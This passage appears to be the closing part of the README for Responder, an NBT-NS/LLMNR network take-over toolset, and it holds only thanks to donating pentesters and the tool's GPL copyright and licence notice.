- And all, ALL the pentesters around the world who donated to this project.
Thank you.
## Copyright ##
NBT-NS/LLMNR Responder
Responder, a network take-over set of tools created and maintained by Laurent Gaffie.
email: laurent.gaffie@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.